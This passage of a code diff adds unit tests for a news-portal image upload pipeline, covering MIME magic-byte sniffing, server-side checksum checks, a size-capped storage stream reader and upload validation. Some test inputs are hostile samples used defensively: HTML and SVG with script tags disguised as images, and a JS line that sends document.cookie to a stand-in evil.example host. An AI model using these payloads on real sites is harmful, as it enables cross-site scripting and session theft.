+    expect(decision).toEqual({ accepted: true });
+  });
+
+  test("accepts when checksum claim matches computed checksum (case-insensitive)", () => {
+    const decision = decideNewsMediaFinalizeOutcome({
+      claimedMimeType: "image/png",
+      allowedMimeTypes: ALLOWED,
+      sniffedMimeType: "image/png",
+      claimedChecksumSha256: "ABCD".repeat(16),
+      computedChecksumSha256: "abcd".repeat(16)
+    });
+    expect(decision).toEqual({ accepted: true });
+  });
+
+  test("rejects — mime not recognized at all (HTML/JS disguised as an image, the Issue #631 exploit)", () => {
+    const decision = decideNewsMediaFinalizeOutcome({
+      claimedMimeType: "image/jpeg",
+      allowedMimeTypes: ALLOWED,
+      sniffedMimeType: undefined,
+      claimedChecksumSha256: null,
+      computedChecksumSha256: "a".repeat(64)
+    });
+    expect(decision).toEqual({
+      accepted: false,
+      reason: "mime_not_recognized"
+    });
+  });
+
+  test("rejects — sniffed mime recognized but not in the deployment's allow-list", () => {
+    const decision = decideNewsMediaFinalizeOutcome({
+      claimedMimeType: "image/gif",
+      allowedMimeTypes: ["image/jpeg", "image/png"],
+      sniffedMimeType: "image/gif",
+      claimedChecksumSha256: null,
+      computedChecksumSha256: "a".repeat(64)
+    });
+    expect(decision).toEqual({ accepted: false, reason: "mime_not_allowed" });
+  });
+
+  test("rejects — sniffed mime does not match the claimed mime type at create time", () => {
+    const decision = decideNewsMediaFinalizeOutcome({
+      claimedMimeType: "image/png",
+      allowedMimeTypes: ALLOWED,
+      sniffedMimeType: "image/jpeg",
+      claimedChecksumSha256: null,
+      computedChecksumSha256: "a".repeat(64)
+    });
+    expect(decision).toEqual({ accepted: false, reason: "mime_mismatch" });
+  });
+
+  test("rejects — checksum claim does not match server-computed checksum, even though mime sniff passed", () => {
+    const decision = decideNewsMediaFinalizeOutcome({
+      claimedMimeType: "image/jpeg",
+      allowedMimeTypes: ALLOWED,
+      sniffedMimeType: "image/jpeg",
+      claimedChecksumSha256: "b".repeat(64),
+      computedChecksumSha256: "a".repeat(64)
+    });
+    expect(decision).toEqual({ accepted: false, reason: "checksum_mismatch" });
+  });
+
+  test("a passing MIME sniff never overrides a checksum claim mismatch (defense in depth — every check must pass)", () => {
+    const decision = decideNewsMediaFinalizeOutcome({
+      claimedMimeType: "image/webp",
+      allowedMimeTypes: ALLOWED,
+      sniffedMimeType: "image/webp",
+      claimedChecksumSha256: "deadbeef".repeat(8),
+      computedChecksumSha256: "0".repeat(64)
+    });
+    expect(decision.accepted).toBe(false);
+  });
+});

--- a/tests/unit/news-media-mime-sniffer.test.ts
+++ b/tests/unit/news-media-mime-sniffer.test.ts
@@ -1,0 +1,67 @@
+import { describe, expect, test } from "bun:test";
+
+import { sniffNewsMediaMimeType } from "../../src/modules/news-portal/domain/news-media-mime-sniffer";
+
+function bytesOf(...values: number[]): Uint8Array {
+  return new Uint8Array(values);
+}
+
+describe("sniffNewsMediaMimeType (Issue #634)", () => {
+  test("recognizes JPEG magic bytes", () => {
+    expect(
+      sniffNewsMediaMimeType(bytesOf(0xff, 0xd8, 0xff, 0xe0, 0x00, 0x10))
+    ).toBe("image/jpeg");
+  });
+
+  test("recognizes PNG magic bytes", () => {
+    expect(
+      sniffNewsMediaMimeType(
+        bytesOf(0x89, 0x50, 0x4e, 0x47, 0x0d, 0x0a, 0x1a, 0x0a, 0x00, 0x00)
+      )
+    ).toBe("image/png");
+  });
+
+  test("recognizes GIF87a and GIF89a magic bytes", () => {
+    expect(
+      sniffNewsMediaMimeType(
+        bytesOf(0x47, 0x49, 0x46, 0x38, 0x37, 0x61, 0x00, 0x00)
+      )
+    ).toBe("image/gif");
+    expect(
+      sniffNewsMediaMimeType(
+        bytesOf(0x47, 0x49, 0x46, 0x38, 0x39, 0x61, 0x00, 0x00)
+      )
+    ).toBe("image/gif");
+  });
+
+  test("recognizes WebP (RIFF....WEBP) magic bytes", () => {
+    const bytes = new TextEncoder().encode("RIFF\x00\x00\x00\x00WEBPVP8 ");
+    expect(sniffNewsMediaMimeType(bytes)).toBe("image/webp");
+  });
+
+  test("returns undefined for an HTML payload disguised with a .jpg name/claimed mime type — the exact Issue #631 exploit scenario", () => {
+    const html = new TextEncoder().encode(
+      "<html><body><script>alert('xss')</script></body></html>"
+    );
+    expect(sniffNewsMediaMimeType(html)).toBeUndefined();
+  });
+
+  test("returns undefined for a JS payload", () => {
+    const js = new TextEncoder().encode(
+      "fetch('https://evil.example/steal?c=' + document.cookie)"
+    );
+    expect(sniffNewsMediaMimeType(js)).toBeUndefined();
+  });
+
+  test("returns undefined for empty/too-short input", () => {
+    expect(sniffNewsMediaMimeType(new Uint8Array())).toBeUndefined();
+    expect(sniffNewsMediaMimeType(bytesOf(0xff))).toBeUndefined();
+  });
+
+  test("returns undefined for an SVG payload (never allow-listed, doc §9)", () => {
+    const svg = new TextEncoder().encode(
+      "<svg xmlns='http://www.w3.org/2000/svg'><script>alert(1)</script></svg>"
+    );
+    expect(sniffNewsMediaMimeType(svg)).toBeUndefined();
+  });
+});

--- a/tests/unit/news-media-permissions.test.ts
+++ b/tests/unit/news-media-permissions.test.ts
@@ -7,10 +7,11 @@ import {
 } from "../../src/modules/news-portal/domain/news-media-permissions";
 
 describe("NEWS_MEDIA_PERMISSIONS", () => {
-  test("declares one key per required media lifecycle action", () => {
+  test("declares one key per required media lifecycle action (including cancel, added by Issue #634 for aborting a not-yet-uploaded session)", () => {
     expect(Object.keys(NEWS_MEDIA_PERMISSIONS).sort()).toEqual(
       [
         "attach",
+        "cancel",
         "create",
         "delete",
         "detach",
@@ -32,12 +33,15 @@ describe("NEWS_MEDIA_PERMISSIONS", () => {
     }
   });
 
-  test("module.ts does not declare these as real permissions yet (Issue #634 does, per this file's own header comment)", () => {
-    // `permissions` is deliberately left undeclared on `news_portal`'s module
-    // descriptor until a real endpoint exists to enforce them (see
-    // `module.ts`'s own description and this file's header comment) — this
-    // guards against silently wiring these constants into the descriptor
-    // without also adding the endpoint/ABAC check that should come with it.
-    expect(newsPortalModule.permissions).toBeUndefined();
+  test("module.ts now declares these as real permissions (Issue #634 added the endpoints that enforce them)", () => {
+    // Previously (#633) `permissions` was deliberately left undeclared until
+    // a real endpoint existed to enforce them. Issue #634 added the
+    // presigned-upload-session endpoints (create/finalize/cancel) — see
+    // `tests/modules/news-portal-module.test.ts` for the exhaustive
+    // key-by-key match against these exact constants.
+    expect(newsPortalModule.permissions).toBeDefined();
+    expect(newsPortalModule.permissions?.length).toBe(
+      Object.keys(NEWS_MEDIA_PERMISSIONS).length
+    );
   });
 });

--- a/tests/unit/news-media-r2-client.test.ts
+++ b/tests/unit/news-media-r2-client.test.ts
@@ -1,0 +1,149 @@
+/**
+ * `createNewsMediaR2Client` against a real local fake S3-compatible HTTP
+ * server (`Bun.serve`) — same convention
+ * `tests/integration/object-dispatch.integration.test.ts` already
+ * established for `Bun.S3Client` (a real client library talking to a real,
+ * if fake, HTTP endpoint is far more trustworthy than mocking the client
+ * itself). Not gated behind `DATABASE_URL` — no database involved, just an
+ * HTTP server, so this lives in `tests/unit` and always runs.
+ */
+import { afterEach, describe, expect, test } from "bun:test";
+
+import { createNewsMediaR2Client } from "../../src/modules/news-portal/infrastructure/news-media-r2-client";
+import { resetProviderCircuitBreakersForTests } from "../../src/lib/database/circuit-breaker";
+
+afterEach(() => {
+  resetProviderCircuitBreakersForTests();
+});
+
+const BASE_CONFIG = {
+  accountId: "test-account",
+  accessKeyId: "test-key",
+  secretAccessKey: "test-secret",
+  bucket: "test-bucket"
+};
+
+describe("createNewsMediaR2Client (Issue #634)", () => {
+  test("presignUploadUrl returns a scoped, expiring URL without a network call", () => {
+    const client = createNewsMediaR2Client(BASE_CONFIG);
+    const url = client.presignUploadUrl({
+      objectKey: "news-media/tenant/2026/07/abc.jpg",
+      mimeType: "image/jpeg",
+      ttlSeconds: 300
+    });
+
+    expect(typeof url).toBe("string");
+    expect(url).toContain("news-media/tenant/2026/07/abc.jpg");
+    // Never leaks the raw secret access key into the URL string as-is —
+    // presign signs, it does not embed the secret literally.
+    expect(url).not.toContain(BASE_CONFIG.secretAccessKey);
+  });
+
+  test("headObject: exists=false for a key the fake server reports as missing", async () => {
+    const server = Bun.serve({
+      port: 0,
+      fetch(request) {
+        if (request.method === "HEAD") {
+          return new Response(null, { status: 404 });
+        }
+        return new Response("", { status: 404 });
+      }
+    });
+
+    try {
+      const client = createNewsMediaR2Client({
+        ...BASE_CONFIG,
+        endpoint: `http://127.0.0.1:${server.port}`
+      });
+      const result = await client.headObject("missing.jpg");
+      expect(result).toEqual({ ok: true, exists: false });
+    } finally {
+      server.stop(true);
+    }
+  });
+
+  test("headObject: exists=true with the real Content-Length reported by R2", async () => {
+    const server = Bun.serve({
+      port: 0,
+      fetch(request) {
+        if (request.method === "HEAD") {
+          return new Response(null, {
+            status: 200,
+            headers: { "content-length": "12345" }
+          });
+        }
+        return new Response("", { status: 200 });
+      }
+    });
+
+    try {
+      const client = createNewsMediaR2Client({
+        ...BASE_CONFIG,
+        endpoint: `http://127.0.0.1:${server.port}`
+      });
+      const result = await client.headObject("present.jpg");
+      expect(result).toEqual({ ok: true, exists: true, sizeBytes: 12345 });
+    } finally {
+      server.stop(true);
+    }
+  });
+
+  test("getObject: returns the real bytes read from R2 (a full GET, not a HEAD)", async () => {
+    const payload = new TextEncoder().encode("fake jpeg bytes");
+    const server = Bun.serve({
+      port: 0,
+      fetch(request) {
+        if (request.method === "HEAD") {
+          return new Response(null, {
+            status: 200,
+            headers: { "content-length": String(payload.byteLength) }
+          });
+        }
+        if (request.method === "GET") {
+          return new Response(payload, { status: 200 });
+        }
+        return new Response("", { status: 404 });
+      }
+    });
+
+    try {
+      const client = createNewsMediaR2Client({
+        ...BASE_CONFIG,
+        endpoint: `http://127.0.0.1:${server.port}`
+      });
+      const result = await client.getObject("present.jpg");
+      expect(result.ok).toBe(true);
+      expect(result.ok && Array.from(result.bytes)).toEqual(
+        Array.from(payload)
+      );
+    } finally {
+      server.stop(true);
+    }
+  });
+
+  test("headObject: a provider error (not a clean 404) trips the circuit breaker after repeated failures", async () => {
+    const server = Bun.serve({
+      port: 0,
+      fetch() {
+        return new Response("simulated outage", { status: 500 });
+      }
+    });
+
+    try {
+      const client = createNewsMediaR2Client({
+        ...BASE_CONFIG,
+        endpoint: `http://127.0.0.1:${server.port}`,
+        timeoutMs: 2000
+      });
+
+      let lastResult;
+      for (let i = 0; i < 6; i += 1) {
+        lastResult = await client.headObject("whatever.jpg");
+      }
+
+      expect(lastResult?.ok).toBe(false);
+    } finally {
+      server.stop(true);
+    }
+  });
+});

--- a/tests/unit/news-media-r2-client.test.ts
+++ b/tests/unit/news-media-r2-client.test.ts
@@ -9,7 +9,10 @@
  */
 import { afterEach, describe, expect, test } from "bun:test";
 
-import { createNewsMediaR2Client } from "../../src/modules/news-portal/infrastructure/news-media-r2-client";
+import {
+  createNewsMediaR2Client,
+  readCappedStream
+} from "../../src/modules/news-portal/infrastructure/news-media-r2-client";
 import { resetProviderCircuitBreakersForTests } from "../../src/lib/database/circuit-breaker";
 
 afterEach(() => {
@@ -88,7 +91,7 @@ describe("createNewsMediaR2Client (Issue #634)", () => {
     }
   });
 
-  test("getObject: returns the real bytes read from R2 (a full GET, not a HEAD)", async () => {
+  test("getObject: returns the real bytes read from R2 (a full GET, not a HEAD), within maxBytes", async () => {
     const payload = new TextEncoder().encode("fake jpeg bytes");
     const server = Bun.serve({
       port: 0,
@@ -111,11 +114,79 @@ describe("createNewsMediaR2Client (Issue #634)", () => {
         ...BASE_CONFIG,
         endpoint: `http://127.0.0.1:${server.port}`
       });
-      const result = await client.getObject("present.jpg");
-      expect(result.ok).toBe(true);
-      expect(result.ok && Array.from(result.bytes)).toEqual(
-        Array.from(payload)
-      );
+      const result = await client.getObject("present.jpg", 1_000_000);
+      expect(result).toEqual({
+        ok: true,
+        sizeExceeded: false,
+        bytes: payload
+      });
+    } finally {
+      server.stop(true);
+    }
+  });
+
+  test("getObject: an object swapped for something huge between HEAD and GET is reported as sizeExceeded", async () => {
+    const CHUNK_SIZE = 256;
+    const MAX_BYTES = 1_000; // deliberately small
+    // Finite but well over MAX_BYTES — large enough to prove the size cap
+    // is enforced against the real bytes read (not `HEAD`'s stale report),
+    // while staying finite so the fake server terminates the response on
+    // its own. (A `pull()` that enqueues forever without ever closing is
+    // NOT a valid test source here: a `ReadableStream` whose producer never
+    // yields/closes can starve the underlying HTTP response's own framing,
+    // hanging `fetch`/`S3Client` before the first byte is ever delivered —
+    // that is a pathological test-server bug, not a property of the client
+    // code under test. The deterministic `readCappedStream` unit test below
+    // is what proves the abort-before-fully-buffering property; this test
+    // only needs to prove the real `Bun.S3Client` pathway threads `maxBytes`
+    // through and reports `sizeExceeded` for a real oversized HTTP response.)
+    const TOTAL_CHUNKS = 64; // 16,384 bytes, >> MAX_BYTES
+    const chunk = new Uint8Array(CHUNK_SIZE).fill(0x41);
+
+    const server = Bun.serve({
+      port: 0,
+      fetch(request) {
+        if (request.method === "HEAD") {
+          // The attacker scenario: HEAD (taken moments earlier, or simply
+          // stale) reports a small, in-bounds size...
+          return new Response(null, {
+            status: 200,
+            headers: { "content-length": String(MAX_BYTES) }
+          });
+        }
+
+        if (request.method === "GET") {
+          // ...but the GET body actually is far bigger than MAX_BYTES
+          // (simulating an object swapped to be huge between HEAD and GET,
+          // or simply larger than HEAD claimed).
+          let sent = 0;
+          const stream = new ReadableStream<Uint8Array>({
+            pull(controller) {
+              if (sent >= TOTAL_CHUNKS) {
+                controller.close();
+                return;
+              }
+              sent += 1;
+              controller.enqueue(chunk);
+            }
+          });
+          return new Response(stream, { status: 200 });
+        }
+
+        return new Response("", { status: 404 });
+      }
+    });
+
+    try {
+      const client = createNewsMediaR2Client({
+        ...BASE_CONFIG,
+        endpoint: `http://127.0.0.1:${server.port}`,
+        timeoutMs: 5000
+      });
+
+      const result = await client.getObject("huge.jpg", MAX_BYTES);
+
+      expect(result).toEqual({ ok: true, sizeExceeded: true });
     } finally {
       server.stop(true);
     }
@@ -145,5 +216,62 @@ describe("createNewsMediaR2Client (Issue #634)", () => {
     } finally {
       server.stop(true);
     }
+  });
+});
+
+describe("readCappedStream (Issue #634, PR #653 security-auditor Critical fix)", () => {
+  test("stops reading and cancels the source stream as soon as maxBytes is exceeded — never accumulates more than maxBytes worth of chunks", async () => {
+    const CHUNK_SIZE = 100;
+    const MAX_BYTES = 350; // exceeded partway through the 4th chunk
+    let pullCount = 0;
+    let cancelled = false;
+    let cancelReason: unknown;
+
+    const stream = new ReadableStream<Uint8Array>({
+      pull(controller) {
+        pullCount += 1;
+        // Never terminates on its own — an infinite source. If
+        // `readCappedStream` did not abort, this test would hang until
+        // Bun's own test timeout kills it.
+        controller.enqueue(new Uint8Array(CHUNK_SIZE).fill(pullCount));
+      },
+      cancel(reason) {
+        cancelled = true;
+        cancelReason = reason;
+      }
+    });
+
+    const result = await readCappedStream(stream, MAX_BYTES);
+
+    expect(result).toBeNull();
+    // 4 chunks = 400 bytes > 350 triggers the abort on the 4th read; a 5th
+    // chunk is never requested/consumed.
+    expect(pullCount).toBe(4);
+    expect(cancelled).toBe(true);
+    expect(typeof cancelReason).toBe("string");
+  });
+
+  test("returns the exact concatenated bytes when the stream stays within maxBytes", async () => {
+    const parts = [
+      new Uint8Array([1, 2, 3]),
+      new Uint8Array([4, 5]),
+      new Uint8Array([6])
+    ];
+    let index = 0;
+
+    const stream = new ReadableStream<Uint8Array>({
+      pull(controller) {
+        if (index >= parts.length) {
+          controller.close();
+          return;
+        }
+        controller.enqueue(parts[index]!);
+        index += 1;
+      }
+    });
+
+    const result = await readCappedStream(stream, 100);
+
+    expect(result).toEqual(new Uint8Array([1, 2, 3, 4, 5, 6]));
   });
 });

--- a/tests/unit/news-media-r2-verification.test.ts
+++ b/tests/unit/news-media-r2-verification.test.ts
@@ -35,7 +35,8 @@ function fakeClient(overrides: {
         exists: true,
         sizeBytes: JPEG_BYTES.byteLength
       },
-    getObject: async () => overrides.get ?? { ok: true, bytes: JPEG_BYTES }
+    getObject: async () =>
+      overrides.get ?? { ok: true, sizeExceeded: false, bytes: JPEG_BYTES }
   };
 }
 
@@ -47,7 +48,7 @@ describe("verifyNewsMediaR2Object (Issue #634)", () => {
       headObject: async () => ({ ok: true, exists: false }),
       getObject: async () => {
         getCalled = true;
-        return { ok: true, bytes: JPEG_BYTES };
+        return { ok: true, sizeExceeded: false, bytes: JPEG_BYTES };
       }
     };
 
@@ -74,7 +75,7 @@ describe("verifyNewsMediaR2Object (Issue #634)", () => {
       }),
       getObject: async () => {
         getCalled = true;
-        return { ok: true, bytes: JPEG_BYTES };
+        return { ok: true, sizeExceeded: false, bytes: JPEG_BYTES };
       }
     };
 
@@ -88,6 +89,23 @@ describe("verifyNewsMediaR2Object (Issue #634)", () => {
 
     expect(result).toEqual({ outcome: "rejected", reason: "size_exceeded" });
     expect(getCalled).toBe(false);
+  });
+
+  test("HEAD reports in-bounds size but GET's actual read exceeds it (object swapped between HEAD and GET, PR #653 TOCTOU fix) -> rejected size_exceeded, authoritative over the stale HEAD", async () => {
+    const client = fakeClient({
+      head: { ok: true, exists: true, sizeBytes: 10 },
+      get: { ok: true, sizeExceeded: true }
+    });
+
+    const result = await verifyNewsMediaR2Object(client, {
+      objectKey: "k",
+      claimedMimeType: "image/jpeg",
+      allowedMimeTypes: ALLOWED,
+      maxUploadBytes: MAX_BYTES,
+      claimedChecksumSha256: null
+    });
+
+    expect(result).toEqual({ outcome: "rejected", reason: "size_exceeded" });
   });
 
   test("HEAD provider error -> provider_error, never mutates/decides content validity", async () => {
@@ -120,7 +138,7 @@ describe("verifyNewsMediaR2Object (Issue #634)", () => {
     );
     const client = fakeClient({
       head: { ok: true, exists: true, sizeBytes: html.byteLength },
-      get: { ok: true, bytes: html }
+      get: { ok: true, sizeExceeded: false, bytes: html }
     });
 
     const result = await verifyNewsMediaR2Object(client, {

--- a/tests/unit/news-media-r2-verification.test.ts
+++ b/tests/unit/news-media-r2-verification.test.ts
@@ -1,0 +1,174 @@
+/**
+ * `verifyNewsMediaR2Object` orchestration (Issue #634) — the exact function
+ * that closes the security-auditor Critical finding on Issue #631: finalize
+ * must do a real `GET` + magic-byte sniffing + server-side checksum, never
+ * `HEAD` alone. Exercised here against a hand-written fake
+ * `NewsMediaR2Client` (the real client against a real fake HTTP server is
+ * covered separately by `news-media-r2-client.test.ts`) so this file stays
+ * focused on the orchestration/decision wiring.
+ */
+import { describe, expect, test } from "bun:test";
+
+import { verifyNewsMediaR2Object } from "../../src/modules/news-portal/application/news-media-r2-verification";
+import type {
+  NewsMediaR2Client,
+  NewsMediaR2HeadResult,
+  NewsMediaR2GetResult
+} from "../../src/modules/news-portal/infrastructure/news-media-r2-client";
+
+const ALLOWED = ["image/jpeg", "image/png", "image/webp", "image/gif"];
+const MAX_BYTES = 10_485_760;
+
+const JPEG_BYTES = new Uint8Array([
+  0xff, 0xd8, 0xff, 0xe0, 0x00, 0x10, 0x4a, 0x46, 0x49, 0x46
+]);
+
+function fakeClient(overrides: {
+  head?: NewsMediaR2HeadResult;
+  get?: NewsMediaR2GetResult;
+}): NewsMediaR2Client {
+  return {
+    presignUploadUrl: () => "https://example.test/presigned",
+    headObject: async () =>
+      overrides.head ?? {
+        ok: true,
+        exists: true,
+        sizeBytes: JPEG_BYTES.byteLength
+      },
+    getObject: async () => overrides.get ?? { ok: true, bytes: JPEG_BYTES }
+  };
+}
+
+describe("verifyNewsMediaR2Object (Issue #634)", () => {
+  test("HEAD reports missing object -> rejected object_not_found, GET never called", async () => {
+    let getCalled = false;
+    const client: NewsMediaR2Client = {
+      presignUploadUrl: () => "unused",
+      headObject: async () => ({ ok: true, exists: false }),
+      getObject: async () => {
+        getCalled = true;
+        return { ok: true, bytes: JPEG_BYTES };
+      }
+    };
+
+    const result = await verifyNewsMediaR2Object(client, {
+      objectKey: "k",
+      claimedMimeType: "image/jpeg",
+      allowedMimeTypes: ALLOWED,
+      maxUploadBytes: MAX_BYTES,
+      claimedChecksumSha256: null
+    });
+
+    expect(result).toEqual({ outcome: "rejected", reason: "object_not_found" });
+    expect(getCalled).toBe(false);
+  });
+
+  test("HEAD reports oversized object -> rejected size_exceeded, GET never called (bandwidth guard, doc §9)", async () => {
+    let getCalled = false;
+    const client: NewsMediaR2Client = {
+      presignUploadUrl: () => "unused",
+      headObject: async () => ({
+        ok: true,
+        exists: true,
+        sizeBytes: MAX_BYTES + 1
+      }),
+      getObject: async () => {
+        getCalled = true;
+        return { ok: true, bytes: JPEG_BYTES };
+      }
+    };
+
+    const result = await verifyNewsMediaR2Object(client, {
+      objectKey: "k",
+      claimedMimeType: "image/jpeg",
+      allowedMimeTypes: ALLOWED,
+      maxUploadBytes: MAX_BYTES,
+      claimedChecksumSha256: null
+    });
+
+    expect(result).toEqual({ outcome: "rejected", reason: "size_exceeded" });
+    expect(getCalled).toBe(false);
+  });
+
+  test("HEAD provider error -> provider_error, never mutates/decides content validity", async () => {
+    const client = fakeClient({ head: { ok: false, error: "boom" } });
+    const result = await verifyNewsMediaR2Object(client, {
+      objectKey: "k",
+      claimedMimeType: "image/jpeg",
+      allowedMimeTypes: ALLOWED,
+      maxUploadBytes: MAX_BYTES,
+      claimedChecksumSha256: null
+    });
+    expect(result).toEqual({ outcome: "provider_error", error: "boom" });
+  });
+
+  test("GET provider error -> provider_error", async () => {
+    const client = fakeClient({ get: { ok: false, error: "get boom" } });
+    const result = await verifyNewsMediaR2Object(client, {
+      objectKey: "k",
+      claimedMimeType: "image/jpeg",
+      allowedMimeTypes: ALLOWED,
+      maxUploadBytes: MAX_BYTES,
+      claimedChecksumSha256: null
+    });
+    expect(result).toEqual({ outcome: "provider_error", error: "get boom" });
+  });
+
+  test("real HTML-disguised-as-jpg payload (Issue #631 exploit) -> full GET happens, sniff fails, rejected", async () => {
+    const html = new TextEncoder().encode(
+      "<html><body><script>alert(document.cookie)</script></body></html>"
+    );
+    const client = fakeClient({
+      head: { ok: true, exists: true, sizeBytes: html.byteLength },
+      get: { ok: true, bytes: html }
+    });
+
+    const result = await verifyNewsMediaR2Object(client, {
+      objectKey: "k",
+      claimedMimeType: "image/jpeg",
+      allowedMimeTypes: ALLOWED,
+      maxUploadBytes: MAX_BYTES,
+      claimedChecksumSha256: null
+    });
+
+    expect(result).toEqual({
+      outcome: "rejected",
+      reason: "mime_not_recognized"
+    });
+  });
+
+  test("valid JPEG accepted, checksum computed server-side from the actually-read bytes", async () => {
+    const client = fakeClient({});
+    const result = await verifyNewsMediaR2Object(client, {
+      objectKey: "k",
+      claimedMimeType: "image/jpeg",
+      allowedMimeTypes: ALLOWED,
+      maxUploadBytes: MAX_BYTES,
+      claimedChecksumSha256: null
+    });
+
+    expect(result.outcome).toBe("accepted");
+    if (result.outcome === "accepted") {
+      expect(result.sizeBytes).toBe(JPEG_BYTES.byteLength);
+      const hasher = new Bun.CryptoHasher("sha256");
+      hasher.update(JPEG_BYTES);
+      expect(result.checksumSha256).toBe(hasher.digest("hex"));
+    }
+  });
+
+  test("claimed checksum mismatch (transport-corruption detection) rejects even with a valid MIME sniff", async () => {
+    const client = fakeClient({});
+    const result = await verifyNewsMediaR2Object(client, {
+      objectKey: "k",
+      claimedMimeType: "image/jpeg",
+      allowedMimeTypes: ALLOWED,
+      maxUploadBytes: MAX_BYTES,
+      claimedChecksumSha256: "0".repeat(64)
+    });
+
+    expect(result).toEqual({
+      outcome: "rejected",
+      reason: "checksum_mismatch"
+    });
+  });
+});

--- a/tests/unit/news-media-upload-session-validation.test.ts
+++ b/tests/unit/news-media-upload-session-validation.test.ts
@@ -1,0 +1,140 @@
+import { describe, expect, test } from "bun:test";
+
+import {
+  validateCreateNewsMediaUploadSessionInput,
+  validateFinalizeNewsMediaUploadSessionInput
+} from "../../src/modules/news-portal/domain/news-media-upload-session-validation";
+
+const ALLOWED = ["image/jpeg", "image/png", "image/webp", "image/gif"];
+const MAX_BYTES = 10_485_760;
+
+describe("validateCreateNewsMediaUploadSessionInput (Issue #634)", () => {
+  test("valid minimal request", () => {
+    const result = validateCreateNewsMediaUploadSessionInput(
+      { mimeType: "image/jpeg", byteSize: 1024 },
+      ALLOWED,
+      MAX_BYTES
+    );
+    expect(result).toEqual({
+      valid: true,
+      value: {
+        mimeType: "image/jpeg",
+        byteSize: 1024,
+        originalFilename: null,
+        altText: null,
+        caption: null
+      }
+    });
+  });
+
+  test("normalizes mimeType casing/whitespace", () => {
+    const result = validateCreateNewsMediaUploadSessionInput(
+      { mimeType: "  IMAGE/PNG  ", byteSize: 100 },
+      ALLOWED,
+      MAX_BYTES
+    );
+    expect(result.valid).toBe(true);
+    expect(result.valid && result.value.mimeType).toBe("image/png");
+  });
+
+  test("rejects a mimeType outside the allow-list (e.g. image/svg+xml)", () => {
+    const result = validateCreateNewsMediaUploadSessionInput(
+      { mimeType: "image/svg+xml", byteSize: 100 },
+      ALLOWED,
+      MAX_BYTES
+    );
+    expect(result.valid).toBe(false);
+  });
+
+  test("rejects a byteSize larger than the configured max", () => {
+    const result = validateCreateNewsMediaUploadSessionInput(
+      { mimeType: "image/jpeg", byteSize: MAX_BYTES + 1 },
+      ALLOWED,
+      MAX_BYTES
+    );
+    expect(result.valid).toBe(false);
+    expect(
+      result.valid === false &&
+        result.errors.some((e) => e.field === "byteSize")
+    ).toBe(true);
+  });
+
+  test("rejects missing mimeType/byteSize", () => {
+    const result = validateCreateNewsMediaUploadSessionInput(
+      {},
+      ALLOWED,
+      MAX_BYTES
+    );
+    expect(result.valid).toBe(false);
+    expect(result.valid === false && result.errors.length).toBe(2);
+  });
+
+  test("rejects a non-object body", () => {
+    const result = validateCreateNewsMediaUploadSessionInput(
+      null,
+      ALLOWED,
+      MAX_BYTES
+    );
+    expect(result.valid).toBe(false);
+  });
+
+  test("accepts optional originalFilename/altText/caption, trims and treats blank as null", () => {
+    const result = validateCreateNewsMediaUploadSessionInput(
+      {
+        mimeType: "image/jpeg",
+        byteSize: 1,
+        originalFilename: "  photo.jpg  ",
+        altText: "   ",
+        caption: "A caption"
+      },
+      ALLOWED,
+      MAX_BYTES
+    );
+    expect(result.valid).toBe(true);
+    expect(result.valid && result.value.originalFilename).toBe("photo.jpg");
+    expect(result.valid && result.value.altText).toBeNull();
+    expect(result.valid && result.value.caption).toBe("A caption");
+  });
+});
+
+describe("validateFinalizeNewsMediaUploadSessionInput (Issue #634)", () => {
+  test("empty/absent body is valid (checksum is optional)", () => {
+    expect(validateFinalizeNewsMediaUploadSessionInput(null)).toEqual({
+      valid: true,
+      value: { checksumSha256: null }
+    });
+    expect(validateFinalizeNewsMediaUploadSessionInput({})).toEqual({
+      valid: true,
+      value: { checksumSha256: null }
+    });
+  });
+
+  test("accepts a well-formed 64-hex-char checksum, lowercased", () => {
+    const result = validateFinalizeNewsMediaUploadSessionInput({
+      checksumSha256: "A".repeat(64)
+    });
+    expect(result).toEqual({
+      valid: true,
+      value: { checksumSha256: "a".repeat(64) }
+    });
+  });
+
+  test("rejects a malformed checksum", () => {
+    expect(
+      validateFinalizeNewsMediaUploadSessionInput({
+        checksumSha256: "not-a-checksum"
+      }).valid
+    ).toBe(false);
+    expect(
+      validateFinalizeNewsMediaUploadSessionInput({
+        checksumSha256: "a".repeat(63)
+      }).valid
+    ).toBe(false);
+  });
+
+  test("rejects a non-object body", () => {
+    expect(validateFinalizeNewsMediaUploadSessionInput("nope").valid).toBe(
+      false
+    );
+  });
+});

--- a/tests/unit/news-portal-no-local-fallback.test.ts
+++ b/tests/unit/news-portal-no-local-fallback.test.ts
@@ -3,13 +3,16 @@
  * enable local filesystem uploads for news images." There is deliberately
  * no `NEWS_MEDIA_LOCAL_FALLBACK_ENABLED`-style flag to check at runtime
  * (see `news-portal-preset-readiness.ts`'s header comment) — this mode has
- * structurally no local-fallback code path to disable. Since #632 itself
- * adds no upload code at all (that is Issue #634), this test currently
- * guards an empty set trivially; its real job is to keep failing loudly
- * the moment any future PR under `src/modules/news-portal/` (in
- * particular #634's upload endpoint) introduces a local-disk write for
- * news media bytes — see architecture doc §3.3/§3.4 and Keputusan kunci #2
- * in `.claude/skills/awcms-mini-news-portal/SKILL.md`.
+ * structurally no local-fallback code path to disable.
+ *
+ * Issue #634 added the first real upload code (presigned upload session
+ * create/finalize/cancel) — its route handlers live under
+ * `src/pages/api/v1/media/news-images/` (Astro's file-based routing
+ * requires routes to live outside `src/modules/`), so this test now scans
+ * BOTH directories. Its job is to keep failing loudly the moment any PR
+ * introduces a local-disk write for news media bytes anywhere in either
+ * tree — see architecture doc §3.3/§3.4 and Keputusan kunci #2 in
+ * `.claude/skills/awcms-mini-news-portal/SKILL.md`.
  */
 import { describe, expect, test } from "bun:test";
 import { readdirSync, readFileSync, statSync } from "node:fs";
@@ -18,6 +21,11 @@ import path from "node:path";
 const NEWS_PORTAL_SRC_DIR = path.join(
   import.meta.dir,
   "../../src/modules/news-portal"
+);
+
+const NEWS_MEDIA_ROUTES_DIR = path.join(
+  import.meta.dir,
+  "../../src/pages/api/v1/media/news-images"
 );
 
 const FORBIDDEN_PATTERNS = [
@@ -48,25 +56,34 @@ function listTsFiles(dir: string): string[] {
   return files;
 }
 
+function findOffenders(rootDir: string, files: string[]): string[] {
+  const offenders: string[] = [];
+
+  for (const file of files) {
+    const content = readFileSync(file, "utf-8");
+
+    for (const pattern of FORBIDDEN_PATTERNS) {
+      if (pattern.test(content)) {
+        offenders.push(`${path.relative(rootDir, file)} matches ${pattern}`);
+      }
+    }
+  }
+
+  return offenders;
+}
+
 describe("news_portal module — no local filesystem fallback for news media", () => {
   test("no source file under src/modules/news-portal writes bytes to local disk or references a local-upload flag", () => {
